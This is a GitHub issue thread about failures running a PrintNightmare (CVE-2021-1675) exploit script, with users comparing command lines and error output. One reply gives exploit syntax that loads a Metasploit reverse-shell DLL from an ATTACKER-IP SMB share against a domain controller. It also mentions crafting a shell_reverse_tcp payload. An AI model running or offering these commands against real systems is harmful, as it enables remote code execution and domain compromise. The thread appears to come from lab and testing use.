Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Connection Failed #40

Open
kolet opened this issue Jul 9, 2021 · 6 comments
Open

Connection Failed #40

kolet opened this issue Jul 9, 2021 · 6 comments

Comments

@kolet
Copy link

kolet commented Jul 9, 2021

hi, i tried to run the python script via windows cmd , and linux ubuntu 20 WSL both result in the same error

C:\Users\kolet\Downloads>python3 CVE-2021-1675.py hihi:[email protected] \\192.168.5.101\sft\re.dll [*] Connecting to ncacn_np:192.168.5.52[\PIPE\spoolss] [-] Connection Failed

i shared the re.dll with samba on linux , since it was in WSL i thought it did not work, so i just shared a folder with the re.dll inside and gave everyone permission to read/write into the folder and disable password requirement in the advanced sharing settings .

i made sure 192.168.5.52 could reach \192.168.5.101\sft\ manually (and it could.)

what am i doing wrong ?

thanks !

@wafflesx90
Copy link

wafflesx90 commented Jul 14, 2021

This is the syntax I have had the most success with in my lab. Also, my Metasploit is rusty, but I was only able to craft a working dll via shell_reverse_tcp I am still getting errors with meterpreter/handler, though. Best of luck.

chmod +x CVE-2021-1675.py
./CVE-2021-1675.py whatever.local/lowpriv:Passw0rd1@DC-IP-HERE '\ATTACKER-IP\smb\reverse_64.dll'

@muratberisha98
Copy link

I have the Same error

@MYavuzYAGIS
Copy link

I got exactly the same error.

@SBK-DS
Copy link

SBK-DS commented Nov 26, 2021

I got the same error, Any leads?

@JasmineScholz
Copy link

Did anybody work this out? It's an old thread but I'm struggling with it. Please let me know!! :)

@duplostudio
Copy link

i have some issues with netbios name case, so try "whatever.local" in lowercase / uppercase alternatives

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

7 participants